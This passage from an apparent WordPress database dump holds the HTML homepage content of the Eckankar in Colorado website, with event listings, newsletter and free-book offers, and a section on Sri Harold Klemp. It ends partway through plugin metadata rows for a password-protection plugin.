col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241867,41084,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241890,41087,'plugin_name','Passster'),(241891,41087,'plugin_slug','content-protector'),(241892,41087,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(241893,41087,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick 